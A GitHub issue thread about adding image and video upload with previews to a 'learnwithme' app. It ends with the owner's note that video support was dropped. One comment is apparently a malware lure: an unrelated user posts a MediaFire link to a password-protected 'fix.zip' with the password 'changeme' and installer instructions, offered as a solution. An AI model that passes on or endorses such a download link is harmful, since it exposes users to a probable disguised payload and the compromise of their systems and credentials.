### ISSUE TITLE
Media Handling

### ISSUE THREAD

**Issue by JAmcevoy** [JAmcevoy/learnwithme#5]
As a user, I want to upload and preview images or videos so that I can share media content in my posts.

AC1: I should be able to upload images or videos when creating a post or updating my profile.
AC2: I should see a preview of the media before submitting it.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JAmcevoy** [comment]
It couldn't get the hang of the Video for the posts section so to save time I just went with images.
